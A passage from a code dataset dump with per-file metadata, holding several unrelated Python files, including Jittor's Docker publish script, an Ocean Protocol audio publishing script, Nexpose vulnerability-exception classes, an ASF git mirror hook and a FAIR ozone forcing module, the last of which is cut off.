| 12.059649 | 66 | 0.607507 | 573 | 3,437 | 3.541012 | 0.289703 | 0.069 | 0.0414 | 0.016264 | 0.22622 | 0.207491 | 0.175456 | 0.089699 | 0.089699 | 0.080828 | 0 | 0.05208 | 0.195519 | 3,437 | 284 | 67 | 12.102113 | 0.681736 | 0.441082 | 0 | 0.347826 | 0 | 0 | 0.134021 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.405797 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 1 |
7c0f552f843493e2753dc5c4baf8ccf2206f5f32
| 195 |
py
|
Python
|
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
hackerrank/pickingNumbers.py
|
irvandindaprakoso/online-test-py
|
a7a6cd98ba3e0b74558ecb7e431eb2729077a38a
|
[
"W3C"
] | null | null | null |
def pickingNumbers(a):
# Write your code here
max = 0
for i in a:
c = a.count(i)
d = a.count(i-1)
e = c+d
if e>max:
max = e
return max
| 17.727273 | 26 | 0.435897 | 32 | 195 | 2.65625 | 0.59375 | 0.141176 | 0.164706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019048 | 0.461538 | 195 | 10 | 27 | 19.5 | 0.790476 | 0.102564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c18032075b4197ee9055f4f541529df445b2854
| 998 |
py
|
Python
|
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | null | null | null |
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | 5 |
2021-01-27T22:17:19.000Z
|
2021-12-14T17:13:58.000Z
|
tests/cli/conftest.py
|
Aahbree/reference-data-repository
|
f318c0532aaf941ec4f00c8375c9dea45c56f186
|
[
"MIT"
] | 5 |
2021-12-08T02:33:44.000Z
|
2021-12-13T03:21:51.000Z
|
# This file is part of the Reference Data Repository (refdata).
#
# Copyright (C) 2021 New York University.
#
# refdata is free software; you can redistribute it and/or modify it under the
# terms of the MIT License; see LICENSE file for more details.
"""Fixtures for testing the command-line interface."""
import os
import pytest
from click.testing import CliRunner
from refdata.db import DB
import refdata.config as config
@pytest.fixture
def refdata_cli(tmpdir):
"""Initialize the environment and the database for the local store."""
basedir = os.path.abspath(str(tmpdir))
connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))
DB(connect_url=connect_url).init()
os.environ[config.ENV_BASEDIR] = basedir
os.environ[config.ENV_URL] = connect_url
# Make sure to reset the database.
yield CliRunner()
# Clear environment variables that were set for the test runner.
del os.environ[config.ENV_BASEDIR]
del os.environ[config.ENV_URL]
| 30.242424 | 78 | 0.733467 | 148 | 998 | 4.885135 | 0.547297 | 0.055325 | 0.082988 | 0.099585 | 0.135546 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004831 | 0.170341 | 998 | 32 | 79 | 31.1875 | 0.868357 | 0.450902 | 0 | 0 | 0 | 0 | 0.035849 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c1a4912119b5eeaa02dc5d6942de0df8f969733
| 1,783 |
py
|
Python
|
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | 4 |
2020-01-12T13:16:16.000Z
|
2020-01-12T15:43:54.000Z
|
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | null | null | null |
python/jittor/utils/publish.py
|
Jittor/Jittor
|
bc945bae94bded917214b0afe12be6bf5b919dbe
|
[
"Apache-2.0"
] | 1 |
2020-01-12T13:17:17.000Z
|
2020-01-12T13:17:17.000Z
|
#!/usr/bin/python3
# ***************************************************************
# Copyright (c) 2022 Jittor. All Rights Reserved.
# Maintainers:
# Dun Liang <randonlang@gmail.com>.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.txt', which is part of this source code package.
# ***************************************************************
# Publish steps:
# 1. build,push,upload docker image[jittor/jittor]
# 2. build,push,upload docker image[jittor/jittor-cuda]
# upload to pip:
# rm -rf dist && python3.7 ./setup.py sdist && python3.7 -m twine upload dist/*
import os
def run_cmd(cmd):
print("[run cmd]", cmd)
assert os.system(cmd) == 0
def upload_file(path):
run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")
def docker_task(name, build_cmd):
run_cmd(build_cmd)
run_cmd(f"sudo docker push {name}")
bname = os.path.basename(name)
run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
upload_file(f"/tmp/{bname}.tgz")
docker_task(
"jittor/jittor-cuda-11-1",
"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)
docker_task(
"jittor/jittor",
"sudo docker build --tag jittor/jittor:latest . --network host"
)
docker_task(
"jittor/jittor-cuda",
"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)
docker_task(
"jittor/jittor-cuda-10-1",
"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)
run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update")
| 34.288462 | 144 | 0.647224 | 258 | 1,783 | 4.403101 | 0.403101 | 0.105634 | 0.098592 | 0.077465 | 0.498239 | 0.387324 | 0.285211 | 0.123239 | 0 | 0 | 0 | 0.029373 | 0.140774 | 1,783 | 52 | 145 | 34.288462 | 0.712141 | 0.326416 | 0 | 0.137931 | 0 | 0.137931 | 0.643098 | 0.296296 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.103448 | false | 0 | 0.034483 | 0 | 0.137931 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c1dfdf1304b0b11fe75fef3682da8277a3d5207
| 2,981 |
py
|
Python
|
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | 1 |
2022-02-26T00:10:03.000Z
|
2022-02-26T00:10:03.000Z
|
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | null | null | null |
racer/methods/genetic_programming/parameterized.py
|
max-eth/racer
|
952991aedec5d8229bb1126c9c066613f5c30146
|
[
"MIT"
] | null | null | null |
import copy
import numpy as np
from racer.utils import load_pickle
from racer.methods.genetic_programming.program_tree import ProgramTree
class ParameterizedTree(ProgramTree):
# This makes the assumption that all children of the underlying tree are in a field .children and that the underlying tree has the field .name
def __init__(self, underlying_tree, init_fct=None, _copy=True):
if _copy:
underlying_tree = copy.deepcopy(underlying_tree) # safety first
if hasattr(underlying_tree, "children"):
underlying_tree.children = [
ParameterizedTree(underlying_tree=child, _copy=False)
for child in underlying_tree.children
]
self.underlying_tree = underlying_tree
if init_fct is None:
self.set_params([1, 0])
else:
self.set_params(init_fct())
def set_params(self, params):
self.weight, self.bias = params
self.name = self.underlying_tree.name + " * {} + {}".format(
self.weight, self.bias
)
def get_params(self):
return [self.weight, self.bias]
def __call__(self, *x):
return self.underlying_tree(*x) * self.weight + self.bias
def __len__(self):
return len(self.underlying_tree)
def display(self, prefix):
res = prefix + self.name + "\n"
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
res += child.display(prefix=" " + prefix)
return res
def _set_dirty(self):
raise Exception("Parameterized trees should not be mutated")
def in_order(self):
yield self
if hasattr(self.underlying_tree, "children"):
for child in self.underlying_tree.children:
for node in child.in_order():
yield node
class ParameterizedIndividual:
def __init__(self, parameterized_trees):
self.parameterized_trees = parameterized_trees
@staticmethod
def from_individual(ind):
return ParameterizedIndividual(
parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]
)
@staticmethod
def from_pickled_individual(fname):
return ParameterizedIndividual.from_individual(load_pickle(fname))
def __call__(self, *x):
return [tree(*x) for tree in self.parameterized_trees]
def __len__(self):
return sum(len(tree) for tree in self.parameterized_trees)
def set_flat_parameters(self, params):
n_used = 0
for tree in self.parameterized_trees:
for node in tree.in_order():
node.set_params(list(params[n_used : n_used + 2]))
n_used += 2
def get_flat_parameters(self):
params = []
for tree in self.parameterized_trees:
for node in tree.in_order():
params += node.get_params()
return np.array(params)
| 32.402174 | 146 | 0.637035 | 356 | 2,981 | 5.103933 | 0.255618 | 0.13869 | 0.089158 | 0.039626 | 0.226197 | 0.171712 | 0.171712 | 0.134287 | 0.134287 | 0.134287 | 0 | 0.002325 | 0.27843 | 2,981 | 91 | 147 | 32.758242 | 0.842399 | 0.051325 | 0 | 0.2 | 0 | 0 | 0.027965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.057143 | 0.1 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c28fc0563fc8f73fd257c1d3e24a953c2e9ec7c
| 1,780 |
py
|
Python
|
src/compas/datastructures/mesh/bbox.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | 2 |
2021-03-17T18:14:22.000Z
|
2021-09-19T13:50:02.000Z
|
src/compas/datastructures/mesh/bbox.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | 9 |
2019-09-11T08:53:19.000Z
|
2019-09-16T08:35:39.000Z
|
src/compas/datastructures/mesh/bbox.py
|
Licini/compas
|
34f65adb3d0abc3f403312ffba62aa76f3376292
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from compas.geometry import bounding_box
from compas.geometry import bounding_box_xy
__all__ = [
'mesh_bounding_box',
'mesh_bounding_box_xy',
]
def mesh_bounding_box(mesh):
"""Compute the (axis aligned) bounding box of a mesh.
Parameters
----------
mesh : compas.datastructures.Mesh
The mesh data structure.
Returns
-------
list of point
The 8 corners of the bounding box of the mesh.
Examples
--------
>>> mesh_bounding_box(mesh)
[[0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0], [0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0]]
"""
xyz = mesh.vertices_attributes('xyz', keys=list(mesh.vertices()))
return bounding_box(xyz)
def mesh_bounding_box_xy(mesh):
"""Compute the (axis aligned) bounding box of a projection of the mesh in the XY plane.
Parameters
----------
mesh : compas.datastructures.Mesh
The mesh data structure.
Returns
-------
list of point
The 4 corners of the bounding polygon in the XY plane.
Examples
--------
>>> mesh_bounding_box_xy(mesh)
[[0.0, 0.0, 0.0], [10.0, 0.0, 0.0], [10.0, 10.0, 0.0], [0.0, 10.0, 0.0]]
"""
xyz = mesh.vertices_attributes('xyz')
return bounding_box_xy(xyz)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
import doctest
import compas
from compas.datastructures import Mesh
mesh = Mesh.from_obj(compas.get('faces.obj'))
doctest.testmod()
| 23.733333 | 148 | 0.561236 | 247 | 1,780 | 3.842105 | 0.206478 | 0.096944 | 0.110643 | 0.101159 | 0.514226 | 0.478398 | 0.404636 | 0.404636 | 0.404636 | 0.322445 | 0 | 0.061297 | 0.211798 | 1,780 | 74 | 149 | 24.054054 | 0.61511 | 0.538202 | 0 | 0 | 0 | 0 | 0.085592 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.380952 | 0 | 0.571429 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c3522929deb4bb2524b97c1af2b5f08df9a050e
| 5,585 |
py
|
Python
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 1 |
2019-08-28T12:12:09.000Z
|
2019-08-28T12:12:09.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 8 |
2020-09-07T01:00:44.000Z
|
2022-03-02T05:19:32.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 3 |
2019-08-24T20:36:08.000Z
|
2021-02-18T20:28:11.000Z
|
import sys
import logging
# loggers_dict = logging.Logger.manager.loggerDict
#
# logger = logging.getLogger()
# logger.handlers = []
#
# # Set level
# logger.setLevel(logging.DEBUG)
#
# # FORMAT = "%(asctime)s - %(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
# # FORMAT = "%(asctime)s %(levelno)s: %(module)30s %(message)s"
# FORMAT = "%(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
#
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# formatter = logging.Formatter(FORMAT, DATE_FMT)
#
# # Create handler and assign
# handler = logging.StreamHandler(sys.stderr)
# handler.setFormatter(formatter)
# logger.handlers = [handler]
# logger.debug("Logging started")
#%%
# Standard imports
import os
from pathlib import Path
import json
from time import sleep
# Ocean imports
import squid_py
from squid_py.ocean.ocean import Ocean
from squid_py.config import Config
from pprint import pprint
import mantaray_utilities as manta_utils
from mantaray_utilities.user import password_map
#%% CONFIG
OCEAN_CONFIG_PATH = Path().cwd() / 'config_nile.ini'
assert OCEAN_CONFIG_PATH.exists(), "{} - path does not exist".format(OCEAN_CONFIG_PATH)
os.environ['OCEAN_CONFIG_PATH'] = str(OCEAN_CONFIG_PATH)
PASSWORD_PATH=Path().cwd() / ".nile_passwords"
assert PASSWORD_PATH.exists()
os.environ["PASSWORD_PATH"] = str(PASSWORD_PATH)
MARKET_PLACE_PROVIDER_ADDRESS="0x376817c638d2a04f475a73af37f7b51a2862d567"
os.environ["MARKET_PLACE_PROVIDER_ADDRESS"] = MARKET_PLACE_PROVIDER_ADDRESS
JSON_TEMPLATE = Path().cwd() / 'metadata_template.json'
assert JSON_TEMPLATE.exists()
#%% ARGPARSE
import argparse
parser = argparse.ArgumentParser(description='Publish audio')
parser.add_argument('--url', type=str, help='URL for input audio file')
parser.add_argument('--price', type=int, help='Selling price in Ocean token')
parser.add_argument('--reward', type=int, help='Reward offered in Ocean token')
parser.add_argument('--number-nodes', type=int, help='Number of processor nodes requested')
args = parser.parse_args()
logging.info("************************************************************".format())
logging.info("*** ETHBERLINZWEI HACKATHON ***".format())
logging.info("*** SPEECH2TEXT ***".format())
logging.info("*** STEP 1 - CLIENT REGISTERS A CLIP INTO OCEAN PROTOCOL ***".format())
logging.info("************************************************************".format())
logging.info("".format())
logging.info("(Step 1.1 not implemented - upload audio file from client to storage)".format())
logging.info("Publishing Audio to NILE network: {}".format(args.url))
logging.info("Will set price to {} OCEAN".format(args.price))
logging.info("Offering {} OCEAN reward".format(args.reward))
logging.info("Requesting {} processors".format(args.number_nodes))
logging.info("".format())
#%%
# Get the configuration file path for this environment
logging.info("Configuration file selected: {}".format(OCEAN_CONFIG_PATH))
# logging.critical("Deployment type: {}".format(manta_utils.config.get_deployment_type()))
logging.info("Squid API version: {}".format(squid_py.__version__))
#%%
# Instantiate Ocean with the default configuration file.
configuration = Config(OCEAN_CONFIG_PATH)
squid_py.ConfigProvider.set_config(configuration)
ocn = Ocean(configuration)
#%%
# Get a publisher account
publisher_acct = manta_utils.user.get_account_by_index(ocn,0)
#%%
logging.info("Publisher account address: {}".format(publisher_acct.address))
logging.info("Publisher account Testnet 'ETH' balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).eth/10**18))
logging.info("Publisher account Testnet Ocean balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).ocn/10**18))
def publish(url, price, reward, number_nodes):
# metadata = squid_py.ddo.metadata.Metadata.get_example()
# print('Name of asset:', metadata['base']['name'])
with open(JSON_TEMPLATE, 'r') as f:
metadata = json.load(f)
metadata['base']['files'][0]['url'] = url
metadata['base']['price'] = str(price)
metadata['additionalInformation']['reward'] = str(reward)
metadata['additionalInformation']['numberNodes'] = str(number_nodes)
ddo = ocn.assets.create(metadata, publisher_acct)
registered_did = ddo.did
logging.info("New asset registered at {}".format(str(registered_did)))
logging.info("Asset name: {}".format(metadata['base']['name']))
logging.info("Encrypted files to secret store, cipher text: [{}...] . ".format(ddo.metadata['base']['encryptedFiles'][:50]))
return registered_did
registered_did = publish(args.url, args.price, args.reward, args.number_nodes)
#TODO: Better handling based on reciept
print("Wait for the transaction to complete!")
sleep(10)
# %%
ddo = ocn.assets.resolve(registered_did)
# print("Asset '{}' resolved from Aquarius metadata storage: {}".format(ddo.did,ddo.metadata['base']['name']))
# %% [markdown]
# Similarly, we can verify that this asset is registered into the blockchain, and that you are the owner.
# %%
# We need the pure ID string as in the DID registry (a DID without the prefixes)
asset_id = squid_py.did.did_to_id(registered_did)
owner = ocn._keeper.did_registry.contract_concise.getDIDOwner(asset_id)
# print("Asset ID", asset_id, "owned by", owner)
assert str.lower(owner) == str.lower(publisher_acct.address)
logging.info("".format())
logging.info("Successfully registered Audio!".format())
logging.info("Asset Owner: {}".format(owner))
logging.info("Asset DID: {}".format(registered_did))
| 36.986755 | 128 | 0.708684 | 721 | 5,585 | 5.363384 | 0.306519 | 0.06827 | 0.039566 | 0.024825 | 0.138092 | 0.088699 | 0.049651 | 0.049651 | 0.03129 | 0 | 0 | 0.012566 | 0.116562 | 5,585 | 150 | 129 | 37.233333 | 0.77118 | 0.253715 | 0 | 0.067568 | 0 | 0 | 0.315175 | 0.062014 | 0 | 0 | 0.010214 | 0.006667 | 0.054054 | 1 | 0.013514 | false | 0.054054 | 0.175676 | 0 | 0.202703 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c359f84b8ac8bafab4c67c76d69bd091361babb
| 3,613 |
py
|
Python
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 29 |
2017-06-27T04:44:03.000Z
|
2021-11-29T15:04:00.000Z
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 40 |
2017-06-21T18:00:49.000Z
|
2018-06-06T21:13:34.000Z
|
nexpose/nexpose_vulnerabilityexception.py
|
Patralos/nexpose-client-python
|
bec81da29883b1b004046e29a9e7f7a6686467c1
|
[
"BSD-3-Clause"
] | 23 |
2017-07-18T16:40:57.000Z
|
2021-01-26T09:58:53.000Z
|
# Future Imports for py2/3 backwards compat.
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import object
from .xml_utils import get_attribute, get_content_of
from future import standard_library
standard_library.install_aliases()
def fix_null(data):
if data == 'null':
return 0
return data
class VulnerabilityExceptionStatus(object):
UNDER_REVIEW = "Under Review"
APPROVED = "Approved"
REJECTED = "Rejected"
DELETED = "Deleted" # This state is also used for recalled exceptions!
class VulnerabilityExceptionReason(object):
FALSE_POSITIVE = "False Positive"
COMPENSATING_CONTROL = "Compensating Control"
ACCEPTABLE_USE = "Acceptable Use"
ACCEPTABLE_RISK = "Acceptable Risk"
OTHER = "Other"
class VulnerabilityExceptionScope(object):
ALL_INSTANCES = "All Instances"
ALL_INSTANCES_SPECIFIC_ASSET = "All Instances on a Specific Asset"
ALL_INSTANCES_SPECIFIC_SITE = "All Instances on a Specific Site"
SPECIFIC_INSTANCE_SPECIFIC_ASSET = "Specific Instance of Specific Asset"
class SiloVulnerabilityExceptionDetails(object):
@staticmethod
def CreateFromXML(xml_data):
details = SiloVulnerabilityExceptionDetails()
details.silo_id = get_attribute(xml_data, 'siloId', details.silo_id)
details.oldest_exception_creation_date = get_attribute(xml_data, 'oldestExceptionCreationDate', details.oldest_exception_creation_date) # TODO: date object
details.pending_exception_count = get_attribute(xml_data, 'pendingVulnExceptionsCount', details.pending_exception_count)
return details
def __init__(self):
self.silo_id = ''
self.oldest_exception_creation_date = 'N/A' # TODO: date object
self.pending_exception_count = 0
class VulnerabilityException(object):
@staticmethod
def CreateFromXML(xml_data):
details = VulnerabilityException()
details.id = int(get_attribute(xml_data, 'exception-id', details.id))
details.vulnerability_id = get_attribute(xml_data, 'vuln-id', details.vulnerability_id)
details.vulnerability_key = get_attribute(xml_data, 'vuln-key', details.vulnerability_key)
details.expiration_date = get_attribute(xml_data, 'expiration-date', details.expiration_date) # TODO: date object
details.submitter = get_attribute(xml_data, 'submitter', details.submitter)
details.submitter_comment = get_content_of(xml_data, 'submitter-comment', details.submitter_comment)
details.reviewer = get_attribute(xml_data, 'reviewer', details.reviewer)
details.reviewer_comment = get_content_of(xml_data, 'reviewer-comment', details.reviewer_comment)
details.status = get_attribute(xml_data, 'status', details.status)
details.reason = get_attribute(xml_data, 'reason', details.reason)
details.scope = get_attribute(xml_data, 'scope', details.scope)
details.asset_id = int(fix_null(get_attribute(xml_data, 'device-id', details.asset_id)))
details.asset_port = int(fix_null(get_attribute(xml_data, 'port-no', details.asset_port)))
return details
def __init__(self):
self.id = 0
self.vulnerability_id = ''
self.vulnerability_key = ''
self.expiration_date = '' # TODO: date object
self.submitter = ''
self.submitter_comment = ''
self.reviewer = ''
self.reviewer_comment = ''
self.status = ''
self.reason = ''
self.scope = ''
self.asset_id = 0
self.asset_port = 0
| 42.011628 | 164 | 0.715749 | 408 | 3,613 | 6.056373 | 0.245098 | 0.050992 | 0.084986 | 0.107649 | 0.231081 | 0.10603 | 0.062323 | 0 | 0 | 0 | 0 | 0.002406 | 0.194575 | 3,613 | 85 | 165 | 42.505882 | 0.846735 | 0.045115 | 0 | 0.114286 | 0 | 0 | 0.118211 | 0.015394 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.071429 | false | 0 | 0.057143 | 0 | 0.442857 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c4bb1688cf1e8399ddcf1585b39fc36418f8801
| 827 |
py
|
Python
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2019-06-09T10:25:04.000Z
|
2019-06-09T10:25:04.000Z
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2020-05-08T07:07:43.000Z
|
2020-05-08T07:07:43.000Z
|
modules/gitbox/files/asfgit/hooks/sync.py
|
Humbedooh/infrastructure-puppet
|
a85f797d847b80e877cd5b7c66513970f6f80703
|
[
"Apache-2.0"
] | 1 |
2019-12-31T07:28:19.000Z
|
2019-12-31T07:28:19.000Z
|
#!/usr/local/bin/python
import json
import socket
import sys
import asfgit.cfg as cfg
import asfgit.git as git
import asfgit.log as log
import asfgit.util as util
import subprocess, os, time
def main():
ghurl = "git@github:apache/%s.git" % cfg.repo_name
os.chdir("/x1/repos/asf/%s.git" % cfg.repo_name)
try:
for ref in git.stream_refs(sys.stdin):
if ref.is_rewrite():
print("Syncing %s (FORCED)..." % ref.name)
subprocess.check_call(["git", "push", "-f", ghurl, "%s:%s" % (ref.newsha, ref.name)])
else:
print("Syncing %s..." % ref.name)
subprocess.check_call(["git", "push", ghurl, "%s:%s" % (ref.newsha, ref.name)])
except subprocess.CalledProcessError as err:
util.abort("Could not sync with GitHub: %s" % err.output)
| 30.62963 | 98 | 0.613059 | 120 | 827 | 4.175 | 0.475 | 0.095808 | 0.027944 | 0.043912 | 0.283433 | 0.223553 | 0.223553 | 0 | 0 | 0 | 0 | 0.001565 | 0.227328 | 827 | 26 | 99 | 31.807692 | 0.782473 | 0.026602 | 0 | 0 | 0 | 0 | 0.16812 | 0.029888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.380952 | 0 | 0.428571 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c5785c50891073f1d8d050a467303e1d02503f4
| 5,967 |
py
|
Python
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 1 |
2020-11-14T16:09:39.000Z
|
2020-11-14T16:09:39.000Z
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 1 |
2020-11-02T17:59:02.000Z
|
2020-11-02T17:59:02.000Z
|
fair/forcing/ozone_tr.py
|
znicholls/FAIR
|
599c44ed140b069968ba7d1ca99de40218e42545
|
[
"Apache-2.0"
] | 2 |
2020-11-02T16:42:05.000Z
|
2020-12-15T16:36:24.000Z
|
from __future__ import division
import numpy as np
from ..constants import molwt
def regress(emissions,
beta=np.array([2.8249e-4, 1.0695e-4, -9.3604e-4, 99.7831e-4])):
"""Calculates tropospheric ozone forcing from precursor emissions.
Inputs: (nt x 40) emissions array
Keywords:
beta: 4-element array of regression coefficients of precursor
radiative efficiency, W m-2 (Mt yr-1)-1.
order is [CH4, CO, NMVOC, NOx]
Outputs:
tropospheric ozone ERF time series.
"""
if emissions.ndim==2:
em_CH4, em_CO, em_NMVOC, em_NOx = emissions[:,[3, 6, 7, 8]].T
else:
em_CH4, em_CO, em_NMVOC, em_NOx = emissions[[3, 6, 7, 8]]
F_CH4 = beta[0] * em_CH4
F_CO = beta[1] * em_CO
F_NMVOC = beta[2] * em_NMVOC
F_NOx = beta[3] * em_NOx
F = F_CH4 + F_CO + F_NMVOC + F_NOx
return F
def cmip6_stevenson(emissions, C_CH4, T=0, feedback=False,
PI=np.array([722, 170, 10, 4.29]),
beta=np.array([1.77871043e-04, 5.80173377e-05, 2.09151270e-03,
1.94458719e-04])):
"""Calculates tropospheric ozone forcing from precursor emissions based on
Stevenson et al, 2013 10.5194/acp-13-3063-2013
Inputs:
emissions: (nt x 40) numpy array
C_CH4 : (nt) numpy array of methane concentrations, ppb
Keywords:
T : change in surface temperature since pre-industrial
feedback : True or False - include temperature feedback on ozone
forcing?
PI: : 4-element array of pre-industrial CH4 concentrations,
CO emissions, NMVOC emissions and NOx emissions
beta: : coefficients of how CH4 concentrations, CO emissions,
NMVOC emissions and NOx emissions affect forcing
Outputs:
